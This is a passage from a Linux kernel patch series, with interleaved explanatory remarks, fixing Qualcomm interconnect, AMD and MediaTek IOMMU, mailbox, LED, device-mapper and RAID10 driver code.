+ 	provider->dev = dev;
+ 	provider->set = qcom_icc_set;
+diff --git a/drivers/interconnect/qcom/icc-rpm.h b/drivers/interconnect/qcom/icc-rpm.h
+index a49af844ab13e..02257b0d3d5c6 100644
+--- a/drivers/interconnect/qcom/icc-rpm.h
++++ b/drivers/interconnect/qcom/icc-rpm.h
+@@ -91,7 +91,6 @@ struct qcom_icc_desc {
+ 	size_t num_nodes;
+ 	const char * const *clocks;
+ 	size_t num_clocks;
+-	bool has_bus_pd;
+ 	enum qcom_icc_type type;
+ 	const struct regmap_config *regmap_cfg;
+ 	unsigned int qos_offset;
+diff --git a/drivers/interconnect/qcom/msm8996.c b/drivers/interconnect/qcom/msm8996.c
+index 25a1a32bc611f..14efd2761b7ab 100644
+--- a/drivers/interconnect/qcom/msm8996.c
++++ b/drivers/interconnect/qcom/msm8996.c
+@@ -1823,7 +1823,6 @@ static const struct qcom_icc_desc msm8996_a0noc = {
+ 	.num_nodes = ARRAY_SIZE(a0noc_nodes),
+ 	.clocks = bus_a0noc_clocks,
+ 	.num_clocks = ARRAY_SIZE(bus_a0noc_clocks),
+-	.has_bus_pd = true,
+ 	.regmap_cfg = &msm8996_a0noc_regmap_config
+ };
+ 
+diff --git a/drivers/interconnect/qcom/osm-l3.c b/drivers/interconnect/qcom/osm-l3.c
+index 1bafb54f14329..a1f4f918b9116 100644
+--- a/drivers/interconnect/qcom/osm-l3.c
++++ b/drivers/interconnect/qcom/osm-l3.c
+@@ -14,13 +14,6 @@
+ 
+ #include <dt-bindings/interconnect/qcom,osm-l3.h>
+ 
+-#include "sc7180.h"
+-#include "sc7280.h"
+-#include "sc8180x.h"
+-#include "sdm845.h"
+-#include "sm8150.h"
+-#include "sm8250.h"
+-
+ #define LUT_MAX_ENTRIES			40U
+ #define LUT_SRC				GENMASK(31, 30)
+ #define LUT_L_VAL			GENMASK(7, 0)
+diff --git a/drivers/interconnect/qcom/sc7180.h b/drivers/interconnect/qcom/sc7180.h
+index c6212a10c2f61..c2d8388bb8809 100644
+--- a/drivers/interconnect/qcom/sc7180.h
++++ b/drivers/interconnect/qcom/sc7180.h
+@@ -145,7 +145,5 @@
+ #define SC7180_SLAVE_SERVICE_SNOC			134
+ #define SC7180_SLAVE_QDSS_STM				135
+ #define SC7180_SLAVE_TCU				136
+-#define SC7180_MASTER_OSM_L3_APPS			137
+-#define SC7180_SLAVE_OSM_L3				138
+ 
+ #endif
+diff --git a/drivers/interconnect/qcom/sc7280.h b/drivers/interconnect/qcom/sc7280.h
+index 1fb9839b2c14b..175e400305c51 100644
+--- a/drivers/interconnect/qcom/sc7280.h
++++ b/drivers/interconnect/qcom/sc7280.h
+@@ -150,7 +150,5 @@
+ #define SC7280_SLAVE_PCIE_1			139
+ #define SC7280_SLAVE_QDSS_STM			140
+ #define SC7280_SLAVE_TCU			141
+-#define SC7280_MASTER_EPSS_L3_APPS		142
+-#define SC7280_SLAVE_EPSS_L3			143
+ 
+ #endif
+diff --git a/drivers/interconnect/qcom/sc8180x.h b/drivers/interconnect/qcom/sc8180x.h
+index 2eafd35543c78..ce32295af8f3a 100644
+--- a/drivers/interconnect/qcom/sc8180x.h
++++ b/drivers/interconnect/qcom/sc8180x.h
+@@ -168,8 +168,6 @@
+ #define SC8180X_SLAVE_EBI_CH0_DISPLAY		158
+ #define SC8180X_SLAVE_MNOC_SF_MEM_NOC_DISPLAY	159
+ #define SC8180X_SLAVE_MNOC_HF_MEM_NOC_DISPLAY	160
+-#define SC8180X_MASTER_OSM_L3_APPS		161
+-#define SC8180X_SLAVE_OSM_L3			162
+ 
+ #define SC8180X_MASTER_QUP_CORE_0		163
+ #define SC8180X_MASTER_QUP_CORE_1		164
+diff --git a/drivers/interconnect/qcom/sdm845.h b/drivers/interconnect/qcom/sdm845.h
+index 776e9c2acb278..bc7e425ce9852 100644
+--- a/drivers/interconnect/qcom/sdm845.h
++++ b/drivers/interconnect/qcom/sdm845.h
+@@ -136,7 +136,5 @@
+ #define SDM845_SLAVE_SERVICE_SNOC			128
+ #define SDM845_SLAVE_QDSS_STM				129
+ #define SDM845_SLAVE_TCU				130
+-#define SDM845_MASTER_OSM_L3_APPS			131
+-#define SDM845_SLAVE_OSM_L3				132
+ 
+ #endif /* __DRIVERS_INTERCONNECT_QCOM_SDM845_H__ */
+diff --git a/drivers/interconnect/qcom/sm8150.h b/drivers/interconnect/qcom/sm8150.h
+index 97996f64d799c..3e01ac76ae1db 100644
+--- a/drivers/interconnect/qcom/sm8150.h
++++ b/drivers/interconnect/qcom/sm8150.h
+@@ -148,7 +148,5 @@
+ #define SM8150_SLAVE_VSENSE_CTRL_CFG		137
+ #define SM8150_SNOC_CNOC_MAS			138
+ #define SM8150_SNOC_CNOC_SLV			139
+-#define SM8150_MASTER_OSM_L3_APPS		140
+-#define SM8150_SLAVE_OSM_L3			141
+ 
+ #endif
+diff --git a/drivers/interconnect/qcom/sm8250.h b/drivers/interconnect/qcom/sm8250.h
+index b31fb431a20fc..7eb6c709c30d1 100644
+--- a/drivers/interconnect/qcom/sm8250.h
++++ b/drivers/interconnect/qcom/sm8250.h
+@@ -158,7 +158,5 @@
+ #define SM8250_SLAVE_VSENSE_CTRL_CFG		147
+ #define SM8250_SNOC_CNOC_MAS			148
+ #define SM8250_SNOC_CNOC_SLV			149
+-#define SM8250_MASTER_EPSS_L3_APPS		150
+-#define SM8250_SLAVE_EPSS_L3			151
+ 
+ #endif
+diff --git a/drivers/iommu/amd/amd_iommu_types.h b/drivers/iommu/amd/amd_iommu_types.h
+index 3d684190b4d53..f7cb1ce0f9bbc 100644
+--- a/drivers/iommu/amd/amd_iommu_types.h
++++ b/drivers/iommu/amd/amd_iommu_types.h
+@@ -1001,8 +1001,8 @@ struct amd_ir_data {
+ 	 */
+ 	struct irq_cfg *cfg;
+ 	int ga_vector;
+-	int ga_root_ptr;
+-	int ga_tag;
++	u64 ga_root_ptr;
++	u32 ga_tag;
+ };
+ 
+ struct amd_irte_ops {
+diff --git a/drivers/iommu/amd/iommu.c b/drivers/iommu/amd/iommu.c
+index ff4f3d4da3402..e108280fdaa0e 100644
+--- a/drivers/iommu/amd/iommu.c
++++ b/drivers/iommu/amd/iommu.c
+@@ -1656,10 +1656,6 @@ static void do_attach(struct iommu_dev_data *dev_data,
+ 	domain->dev_iommu[iommu->index] += 1;
+ 	domain->dev_cnt                 += 1;
+ 
+-	/* Override supported page sizes */
+-	if (domain->flags & PD_GIOV_MASK)
+-		domain->domain.pgsize_bitmap = AMD_IOMMU_PGSIZES_V2;
+-
+ 	/* Update device table */
+ 	set_dte_entry(iommu, dev_data->devid, domain,
+ 		      ats, dev_data->iommu_v2);
+@@ -2038,6 +2034,8 @@ static int protection_domain_init_v2(struct protection_domain *domain)
+ 
+ 	domain->flags |= PD_GIOV_MASK;
+ 
++	domain->domain.pgsize_bitmap = AMD_IOMMU_PGSIZES_V2;
++
+ 	if (domain_enable_v2(domain, 1)) {
+ 		domain_id_free(domain->id);
+ 		return -ENOMEM;
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index f8100067502fb..e6f2a0bc9f0be 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -1940,8 +1940,13 @@ static struct iommu_domain *__iommu_domain_alloc(struct bus_type *bus,
+ 		return NULL;
+ 
+ 	domain->type = type;
+-	/* Assume all sizes by default; the driver may override this later */
+-	domain->pgsize_bitmap = bus->iommu_ops->pgsize_bitmap;
++	/*
++	 * If not already set, assume all sizes by default; the driver
++	 * may override this later
++	 */
++	if (!domain->pgsize_bitmap)
++		domain->pgsize_bitmap = bus->iommu_ops->pgsize_bitmap;
++
+ 	if (!domain->ops)
+ 		domain->ops = bus->iommu_ops->default_domain_ops;
+ 
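Paired with the amd/iommu.c hunk above, this changes the contract of __iommu_domain_alloc(): a driver may publish its own page-size set before the core sees the domain, and the bus default is only applied when the field is still zero. A hypothetical driver-side sketch (the sizes are illustrative; AMD's real value is AMD_IOMMU_PGSIZES_V2):

	static struct iommu_domain *my_domain_alloc(unsigned int type)
	{
		struct my_domain *dom = kzalloc(sizeof(*dom), GFP_KERNEL);

		if (!dom)
			return NULL;
		/* published before __iommu_domain_alloc() runs */
		dom->domain.pgsize_bitmap = SZ_4K | SZ_2M | SZ_1G;
		return &dom->domain;
	}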
+diff --git a/drivers/iommu/iommufd/selftest.c b/drivers/iommu/iommufd/selftest.c
+index cfb5fe9a5e0ee..76c46847dc494 100644
+--- a/drivers/iommu/iommufd/selftest.c
++++ b/drivers/iommu/iommufd/selftest.c
+@@ -339,10 +339,12 @@ static int iommufd_test_md_check_pa(struct iommufd_ucmd *ucmd,
+ {
+ 	struct iommufd_hw_pagetable *hwpt;
+ 	struct mock_iommu_domain *mock;
++	uintptr_t end;
+ 	int rc;
+ 
+ 	if (iova % MOCK_IO_PAGE_SIZE || length % MOCK_IO_PAGE_SIZE ||
+-	    (uintptr_t)uptr % MOCK_IO_PAGE_SIZE)
++	    (uintptr_t)uptr % MOCK_IO_PAGE_SIZE ||
++	    check_add_overflow((uintptr_t)uptr, (uintptr_t)length, &end))
+ 		return -EINVAL;
+ 
+ 	hwpt = get_md_pagetable(ucmd, mockpt_id, &mock);
+@@ -390,7 +392,10 @@ static int iommufd_test_md_check_refs(struct iommufd_ucmd *ucmd,
+ 				      void __user *uptr, size_t length,
+ 				      unsigned int refs)
+ {
+-	if (length % PAGE_SIZE || (uintptr_t)uptr % PAGE_SIZE)
++	uintptr_t end;
++
++	if (length % PAGE_SIZE || (uintptr_t)uptr % PAGE_SIZE ||
++	    check_add_overflow((uintptr_t)uptr, (uintptr_t)length, &end))
+ 		return -EINVAL;
+ 
+ 	for (; length; length -= PAGE_SIZE) {
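Both selftest hunks close the same hole: a user pointer and length whose sum wraps the address space could previously pass the alignment checks alone. check_add_overflow() from linux/overflow.h returns true when the addition overflows. The pattern in isolation, with a hypothetical helper name:

	#include <linux/overflow.h>

	/* Reject a user range whose end address would wrap. */
	static int validate_user_range(void __user *uptr, size_t length)
	{
		uintptr_t end;

		if (check_add_overflow((uintptr_t)uptr, (uintptr_t)length, &end))
			return -EINVAL;	/* uptr + length wrapped */
		return 0;
	}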
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index 2badd6acfb23d..4ef71afb9525a 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -1267,6 +1267,14 @@ static int mtk_iommu_probe(struct platform_device *pdev)
+ 			return PTR_ERR(data->bclk);
+ 	}
+ 
++	if (MTK_IOMMU_HAS_FLAG(data->plat_data, PGTABLE_PA_35_EN)) {
++		ret = dma_set_mask(dev, DMA_BIT_MASK(35));
++		if (ret) {
++			dev_err(dev, "Failed to set dma_mask 35.\n");
++			return ret;
++		}
++	}
++
+ 	pm_runtime_enable(dev);
+ 
+ 	if (MTK_IOMMU_IS_TYPE(data->plat_data, MTK_IOMMU_TYPE_MM)) {
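The new hunk widens the device's streaming DMA mask before any page-table memory is allocated, so allocations may land anywhere in the 35-bit physical range that PGTABLE_PA_35_EN hardware can address. dma_set_mask() is the standard DMA API call and fails when the platform cannot honour the mask; a minimal usage sketch:

	/* Claim 35-bit DMA addressing, or fail the probe. */
	ret = dma_set_mask(dev, DMA_BIT_MASK(35));
	if (ret) {
		dev_err(dev, "35-bit DMA addressing unavailable\n");
		return ret;
	}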
+diff --git a/drivers/leds/Kconfig b/drivers/leds/Kconfig
+index 499d0f215a8bf..2378cfb7443e4 100644
+--- a/drivers/leds/Kconfig
++++ b/drivers/leds/Kconfig
+@@ -814,7 +814,7 @@ config LEDS_SPI_BYTE
+ config LEDS_TI_LMU_COMMON
+ 	tristate "LED driver for TI LMU"
+ 	depends on LEDS_CLASS
+-	depends on REGMAP
++	select REGMAP
+ 	help
+ 	  Say Y to enable the LED driver for TI LMU devices.
+ 	  This supports common features between the TI LM3532, LM3631, LM3632,
+diff --git a/drivers/leds/leds-tca6507.c b/drivers/leds/leds-tca6507.c
+index 161bef65c6b7b..62a968613cc37 100644
+--- a/drivers/leds/leds-tca6507.c
++++ b/drivers/leds/leds-tca6507.c
+@@ -691,8 +691,9 @@ tca6507_led_dt_init(struct device *dev)
+ 		if (fwnode_property_read_string(child, "label", &led.name))
+ 			led.name = fwnode_get_name(child);
+ 
+-		fwnode_property_read_string(child, "linux,default-trigger",
+-					    &led.default_trigger);
++		if (fwnode_property_read_string(child, "linux,default-trigger",
++						&led.default_trigger))
++			led.default_trigger = NULL;
+ 
+ 		led.flags = 0;
+ 		if (fwnode_property_match_string(child, "compatible",
+diff --git a/drivers/macintosh/Kconfig b/drivers/macintosh/Kconfig
+index 539a2ed4e13dc..a0e717a986dcb 100644
+--- a/drivers/macintosh/Kconfig
++++ b/drivers/macintosh/Kconfig
+@@ -86,6 +86,7 @@ config ADB_PMU_LED
+ 
+ config ADB_PMU_LED_DISK
+ 	bool "Use front LED as DISK LED by default"
++	depends on ATA
+ 	depends on ADB_PMU_LED
+ 	depends on LEDS_CLASS
+ 	select LEDS_TRIGGERS
+diff --git a/drivers/macintosh/windfarm_smu_sat.c b/drivers/macintosh/windfarm_smu_sat.c
+index ebc4256a9e4a0..089f2743a070d 100644
+--- a/drivers/macintosh/windfarm_smu_sat.c
++++ b/drivers/macintosh/windfarm_smu_sat.c
+@@ -171,6 +171,7 @@ static void wf_sat_release(struct kref *ref)
+ 
+ 	if (sat->nr >= 0)
+ 		sats[sat->nr] = NULL;
++	of_node_put(sat->node);
+ 	kfree(sat);
+ }
+ 
+diff --git a/drivers/mailbox/mailbox-mpfs.c b/drivers/mailbox/mailbox-mpfs.c
+index 853901acaeec2..08aa840cccaca 100644
+--- a/drivers/mailbox/mailbox-mpfs.c
++++ b/drivers/mailbox/mailbox-mpfs.c
+@@ -79,6 +79,13 @@ static bool mpfs_mbox_busy(struct mpfs_mbox *mbox)
+ 	return status & SCB_STATUS_BUSY_MASK;
+ }
+ 
++static bool mpfs_mbox_last_tx_done(struct mbox_chan *chan)
++{
++	struct mpfs_mbox *mbox = (struct mpfs_mbox *)chan->con_priv;
++
++	return !mpfs_mbox_busy(mbox);
++}
++
+ static int mpfs_mbox_send_data(struct mbox_chan *chan, void *data)
+ {
+ 	struct mpfs_mbox *mbox = (struct mpfs_mbox *)chan->con_priv;
+@@ -182,7 +189,6 @@ static irqreturn_t mpfs_mbox_inbox_isr(int irq, void *data)
+ 
+ 	mpfs_mbox_rx_data(chan);
+ 
+-	mbox_chan_txdone(chan, 0);
+ 	return IRQ_HANDLED;
+ }
+ 
+@@ -212,6 +218,7 @@ static const struct mbox_chan_ops mpfs_mbox_ops = {
+ 	.send_data = mpfs_mbox_send_data,
+ 	.startup = mpfs_mbox_startup,
+ 	.shutdown = mpfs_mbox_shutdown,
++	.last_tx_done = mpfs_mbox_last_tx_done,
+ };
+ 
+ static int mpfs_mbox_probe(struct platform_device *pdev)
+@@ -247,7 +254,8 @@ static int mpfs_mbox_probe(struct platform_device *pdev)
+ 	mbox->controller.num_chans = 1;
+ 	mbox->controller.chans = mbox->chans;
+ 	mbox->controller.ops = &mpfs_mbox_ops;
+-	mbox->controller.txdone_irq = true;
++	mbox->controller.txdone_poll = true;
++	mbox->controller.txpoll_period = 10u;
+ 
+ 	ret = devm_mbox_controller_register(&pdev->dev, &mbox->controller);
+ 	if (ret) {
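This converts the controller from IRQ-signalled TX completion to polled completion. With txdone_irq the driver must call mbox_chan_txdone() itself, which the inbox ISR was wrongly doing from the RX path; with txdone_poll the mailbox core instead calls ->last_tx_done() every txpoll_period milliseconds until it reports true. The contract in miniature, using the names from these hunks:

	static const struct mbox_chan_ops mpfs_mbox_ops = {
		...
		.last_tx_done = mpfs_mbox_last_tx_done,	/* polled by the core */
	};

	mbox->controller.txdone_poll = true;	/* core polls for completion */
	mbox->controller.txpoll_period = 10;	/* every 10 ms */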
+diff --git a/drivers/mailbox/zynqmp-ipi-mailbox.c b/drivers/mailbox/zynqmp-ipi-mailbox.c
+index 12e004ff1a147..e02a4a18e8c29 100644
+--- a/drivers/mailbox/zynqmp-ipi-mailbox.c
++++ b/drivers/mailbox/zynqmp-ipi-mailbox.c
+@@ -152,7 +152,7 @@ static irqreturn_t zynqmp_ipi_interrupt(int irq, void *data)
+ 	struct zynqmp_ipi_message *msg;
+ 	u64 arg0, arg3;
+ 	struct arm_smccc_res res;
+-	int ret, i;
++	int ret, i, status = IRQ_NONE;
+ 
+ 	(void)irq;
+ 	arg0 = SMC_IPI_MAILBOX_STATUS_ENQUIRY;
+@@ -170,11 +170,11 @@ static irqreturn_t zynqmp_ipi_interrupt(int irq, void *data)
+ 				memcpy_fromio(msg->data, mchan->req_buf,
+ 					      msg->len);
+ 				mbox_chan_received_data(chan, (void *)msg);
+-				return IRQ_HANDLED;
++				status = IRQ_HANDLED;
+ 			}
+ 		}
+ 	}
+-	return IRQ_NONE;
++	return status;
+ }
+ 
+ /**
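Returning from the handler at the first hit meant that when two channels had pending messages in the same interrupt, the second was silently dropped until the next edge. The rewritten loop accumulates the status instead; the shape of the pattern, with hypothetical helpers:

	irqreturn_t status = IRQ_NONE;

	for (i = 0; i < num_chans; i++) {
		if (chan_has_data(i)) {		/* hypothetical check */
			deliver(i);		/* hypothetical dispatch */
			status = IRQ_HANDLED;	/* but keep scanning */
		}
	}
	return status;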
+diff --git a/drivers/md/dm-clone-target.c b/drivers/md/dm-clone-target.c
+index 29e0b85eeaf09..e088081b7a8ad 100644
+--- a/drivers/md/dm-clone-target.c
++++ b/drivers/md/dm-clone-target.c
+@@ -2205,6 +2205,7 @@ static int __init dm_clone_init(void)
+ 	r = dm_register_target(&clone_target);
+ 	if (r < 0) {
+ 		DMERR("Failed to register clone target");
++		kmem_cache_destroy(_hydration_cache);
+ 		return r;
+ 	}
+ 
+diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
+index 7efbdb42cf3b4..3b34270ce607e 100644
+--- a/drivers/md/dm-flakey.c
++++ b/drivers/md/dm-flakey.c
+@@ -124,9 +124,9 @@ static int parse_features(struct dm_arg_set *as, struct flakey_c *fc,
+ 			 * Direction r or w?
+ 			 */
+ 			arg_name = dm_shift_arg(as);
+-			if (!strcasecmp(arg_name, "w"))
++			if (arg_name && !strcasecmp(arg_name, "w"))
+ 				fc->corrupt_bio_rw = WRITE;
+-			else if (!strcasecmp(arg_name, "r"))
++			else if (arg_name && !strcasecmp(arg_name, "r"))
+ 				fc->corrupt_bio_rw = READ;
+ 			else {
+ 				ti->error = "Invalid corrupt bio direction (r or w)";
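dm_shift_arg() returns NULL once the argument set is exhausted, so a truncated feature list used to feed NULL straight into strcasecmp(). The fix is the usual short-circuit guard:

	arg_name = dm_shift_arg(as);			/* may be NULL */
	if (arg_name && !strcasecmp(arg_name, "w"))	/* safe dereference */
		fc->corrupt_bio_rw = WRITE;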
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 53f9f765df9fd..a2b8f8781a99f 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -4646,11 +4646,13 @@ static int __init dm_integrity_init(void)
+ 	}
+ 
+ 	r = dm_register_target(&integrity_target);
+-
+-	if (r < 0)
++	if (r < 0) {
+ 		DMERR("register failed %d", r);
++		kmem_cache_destroy(journal_io_cache);
++		return r;
++	}
+ 
+-	return r;
++	return 0;
+ }
+ 
+ static void __exit dm_integrity_exit(void)
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 37f5ea7337cc2..bd63fc94f1dd9 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -1151,10 +1151,13 @@ static int do_resume(struct dm_ioctl *param)
+ 	/* Do we need to load a new map ? */
+ 	if (new_map) {
+ 		sector_t old_size, new_size;
++		int srcu_idx;
+ 
+ 		/* Suspend if it isn't already suspended */
+-		if (param->flags & DM_SKIP_LOCKFS_FLAG)
++		old_map = dm_get_live_table(md, &srcu_idx);
++		if ((param->flags & DM_SKIP_LOCKFS_FLAG) || !old_map)
+ 			suspend_flags &= ~DM_SUSPEND_LOCKFS_FLAG;
++		dm_put_live_table(md, srcu_idx);
+ 		if (param->flags & DM_NOFLUSH_FLAG)
+ 			suspend_flags |= DM_SUSPEND_NOFLUSH_FLAG;
+ 		if (!dm_suspended_md(md))
+@@ -1539,11 +1542,12 @@ static int table_clear(struct file *filp, struct dm_ioctl *param, size_t param_s
+ 		has_new_map = true;
+ 	}
+ 
+-	param->flags &= ~DM_INACTIVE_PRESENT_FLAG;
+-
+-	__dev_status(hc->md, param);
+ 	md = hc->md;
+ 	up_write(&_hash_lock);
++
++	param->flags &= ~DM_INACTIVE_PRESENT_FLAG;
++	__dev_status(md, param);
++
+ 	if (old_map) {
+ 		dm_sync_table(md);
+ 		dm_table_destroy(old_map);
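The do_resume() hunk makes the skip-lockfs decision depend on whether a live table exists at all, and the lookup follows device-mapper's SRCU discipline: every dm_get_live_table() must be paired with dm_put_live_table() using the same index. The pattern in isolation (real DM helpers, body elided):

	int srcu_idx;
	struct dm_table *map;

	map = dm_get_live_table(md, &srcu_idx);	/* srcu_read_lock inside */
	if (map) {
		/* inspect the live table, e.g. decide on lockfs */
	}
	dm_put_live_table(md, srcu_idx);	/* srcu_read_unlock inside */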
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index c571f2385b57f..3acded2f976db 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -1203,21 +1203,12 @@ struct dm_crypto_profile {
+ 	struct mapped_device *md;
+ };
+ 
+-struct dm_keyslot_evict_args {
+-	const struct blk_crypto_key *key;
+-	int err;
+-};
+-
+ static int dm_keyslot_evict_callback(struct dm_target *ti, struct dm_dev *dev,
+ 				     sector_t start, sector_t len, void *data)
+ {
+-	struct dm_keyslot_evict_args *args = data;
+-	int err;
++	const struct blk_crypto_key *key = data;
+ 
+-	err = blk_crypto_evict_key(dev->bdev, args->key);
+-	if (!args->err)
+-		args->err = err;
+-	/* Always try to evict the key from all devices. */
++	blk_crypto_evict_key(dev->bdev, key);
+ 	return 0;
+ }
+ 
+@@ -1230,7 +1221,6 @@ static int dm_keyslot_evict(struct blk_crypto_profile *profile,
+ {
+ 	struct mapped_device *md =
+ 		container_of(profile, struct dm_crypto_profile, profile)->md;
+-	struct dm_keyslot_evict_args args = { key };
+ 	struct dm_table *t;
+ 	int srcu_idx;
+ 
+@@ -1243,11 +1233,12 @@ static int dm_keyslot_evict(struct blk_crypto_profile *profile,
+ 
+ 		if (!ti->type->iterate_devices)
+ 			continue;
+-		ti->type->iterate_devices(ti, dm_keyslot_evict_callback, &args);
++		ti->type->iterate_devices(ti, dm_keyslot_evict_callback,
++					  (void *)key);
+ 	}
+ 
+ 	dm_put_live_table(md, srcu_idx);
+-	return args.err;
++	return 0;
+ }
+ 
+ static int
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index 64e8ac429984d..14a9988ec30ba 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -523,7 +523,7 @@ static int verity_verify_io(struct dm_verity_io *io)
+ 		sector_t cur_block = io->block + b;
+ 		struct ahash_request *req = verity_io_hash_req(v, io);
+ 
+-		if (v->validated_blocks &&
++		if (v->validated_blocks && bio->bi_status == BLK_STS_OK &&
+ 		    likely(test_bit(cur_block, v->validated_blocks))) {
+ 			verity_bv_skip_block(v, io, iter);
+ 			continue;
+diff --git a/drivers/md/raid10.c b/drivers/md/raid10.c
+index 6c66357f92f55..ea6967aeaa02a 100644
+--- a/drivers/md/raid10.c
++++ b/drivers/md/raid10.c
+@@ -995,11 +995,15 @@ static bool stop_waiting_barrier(struct r10conf *conf)
+ 	    (!bio_list_empty(&bio_list[0]) || !bio_list_empty(&bio_list[1])))
+ 		return true;
+ 
+-	/* move on if recovery thread is blocked by us */
+-	if (conf->mddev->thread->tsk == current &&
+-	    test_bit(MD_RECOVERY_RUNNING, &conf->mddev->recovery) &&
+-	    conf->nr_queued > 0)
++	/*
++	 * move on if io is issued from raid10d(): nr_pending is not released
++	 * from the original io (see handle_read_error()), and all raise_barrier
++	 * callers are blocked until this io is done.
++	 */
++	if (conf->mddev->thread->tsk == current) {
++		WARN_ON_ONCE(atomic_read(&conf->nr_pending) == 0);
+ 		return true;
++	}
+ 
+ 	return false;
+ }
+@@ -1244,7 +1248,8 @@ static void raid10_read_request(struct mddev *mddev, struct bio *bio,
+ 	}
+ 	slot = r10_bio->read_slot;
+ 
+-	if (blk_queue_io_stat(bio->bi_bdev->bd_disk->queue))
++	if (!r10_bio->start_time &&
++	    blk_queue_io_stat(bio->bi_bdev->bd_disk->queue))
+ 		r10_bio->start_time = bio_start_io_acct(bio);
+ 	read_bio = bio_alloc_clone(rdev->bdev, bio, gfp, &mddev->bio_set);
+ 
+@@ -1574,6 +1579,7 @@ static void __make_request(struct mddev *mddev, struct bio *bio, int sectors)
+ 	r10_bio->sector = bio->bi_iter.bi_sector;
+ 	r10_bio->state = 0;
+ 	r10_bio->read_slot = -1;
++	r10_bio->start_time = 0;
+ 	memset(r10_bio->devs, 0, sizeof(r10_bio->devs[0]) *
+ 			conf->geo.raid_disks);
+ 
+@@ -2609,11 +2615,22 @@ static void recovery_request_write(struct mddev *mddev, struct r10bio *r10_bio)
+ {
+ 	struct r10conf *conf = mddev->private;
+ 	int d;
+-	struct bio *wbio, *wbio2;
++	struct bio *wbio = r10_bio->devs[1].bio;
++	struct bio *wbio2 = r10_bio->devs[1].repl_bio;
++
++	/* Need to test wbio2->bi_end_io before we call
++	 * submit_bio_noacct as if the former is NULL,
++	 * the latter is free to free wbio2.
++	 */
++	if (wbio2 && !wbio2->bi_end_io)
++		wbio2 = NULL;
+ 
+ 	if (!test_bit(R10BIO_Uptodate, &r10_bio->state)) {
+ 		fix_recovery_read_error(r10_bio);
+-		end_sync_request(r10_bio);
++		if (wbio->bi_end_io)
++			end_sync_request(r10_bio);
++		if (wbio2)
++			end_sync_request(r10_bio);
+ 		return;
+ 	}
+ 
+@@ -2622,14 +2639,6 @@ static void recovery_request_write(struct mddev *mddev, struct r10bio *r10_bio)
+ 	 * and submit the write request
+ 	 */
+ 	d = r10_bio->devs[1].devnum;
+-	wbio = r10_bio->devs[1].bio;
+-	wbio2 = r10_bio->devs[1].repl_bio;
+-	/* Need to test wbio2->bi_end_io before we call
+-	 * submit_bio_noacct as if the former is NULL,
+-	 * the latter is free to free wbio2.
+-	 */
+-	if (wbio2 && !wbio2->bi_end_io)
+-		wbio2 = NULL;
+ 	if (wbio->bi_end_io) {
+ 		atomic_inc(&conf->mirrors[d].rdev->nr_pending);
+ 		md_sync_acct(conf->mirrors[d].rdev->bdev, bio_sectors(wbio));
+@@ -2978,9 +2987,13 @@ static void handle_read_error(struct mddev *mddev, struct r10bio *r10_bio)
+ 		md_error(mddev, rdev);
+ 
+ 	rdev_dec_pending(rdev, mddev);
+-	allow_barrier(conf);
+ 	r10_bio->state = 0;
+ 	raid10_read_request(mddev, r10_bio->master_bio, r10_bio);
++	/*
++	 * allow_barrier after re-submit to ensure no sync io
++	 * can be issued while regular io is pending.
++	 */
++	allow_barrier(conf);
+ }
+ 
+ static void handle_write_completed(struct r10conf *conf, struct r10bio *r10_bio)
+@@ -3289,10 +3302,6 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 	sector_t chunk_mask = conf->geo.chunk_mask;
+ 	int page_idx = 0;
+ 
+-	if (!mempool_initialized(&conf->r10buf_pool))
+-		if (init_resync(conf))
+-			return 0;
+-
+ 	/*
+ 	 * Allow skipping a full rebuild for incremental assembly
+ 	 * of a clean array, like RAID1 does.
+@@ -3308,6 +3317,10 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 		return mddev->dev_sectors - sector_nr;
+ 	}
+ 
++	if (!mempool_initialized(&conf->r10buf_pool))
++		if (init_resync(conf))
++			return 0;
++
+  skipped:
+ 	max_sector = mddev->dev_sectors;
+ 	if (test_bit(MD_RECOVERY_SYNC, &mddev->recovery) ||
+@@ -4004,6 +4017,20 @@ static int setup_geo(struct geom *geo, struct mddev *mddev, enum geo_type new)
+ 	return nc*fc;
+ }
+ 
++static void raid10_free_conf(struct r10conf *conf)
++{
++	if (!conf)
++		return;
++
++	mempool_exit(&conf->r10bio_pool);
++	kfree(conf->mirrors);
++	kfree(conf->mirrors_old);
++	kfree(conf->mirrors_new);
++	safe_put_page(conf->tmppage);
++	bioset_exit(&conf->bio_split);
++	kfree(conf);
++}
++
+ static struct r10conf *setup_conf(struct mddev *mddev)
+ {
+ 	struct r10conf *conf = NULL;
+@@ -4086,13 +4113,7 @@ static struct r10conf *setup_conf(struct mddev *mddev)
+ 	return conf;
+ 
+  out:
+-	if (conf) {
+-		mempool_exit(&conf->r10bio_pool);
+-		kfree(conf->mirrors);
+-		safe_put_page(conf->tmppage);
+-		bioset_exit(&conf->bio_split);
+-		kfree(conf);
+-	}
++	raid10_free_conf(conf);
+ 	return ERR_PTR(err);
+ }
+ 
+@@ -4129,6 +4150,9 @@ static int raid10_run(struct mddev *mddev)
+ 	if (!conf)
+ 		goto out;
+ 
++	mddev->thread = conf->thread;
++	conf->thread = NULL;
++
+ 	if (mddev_is_clustered(conf->mddev)) {
+ 		int fc, fo;
+ 
+@@ -4141,9 +4165,6 @@ static int raid10_run(struct mddev *mddev)
+ 		}
+ 	}
+ 
+-	mddev->thread = conf->thread;
+-	conf->thread = NULL;
+-
+ 	if (mddev->queue) {
+ 		blk_queue_max_write_zeroes_sectors(mddev->queue, 0);
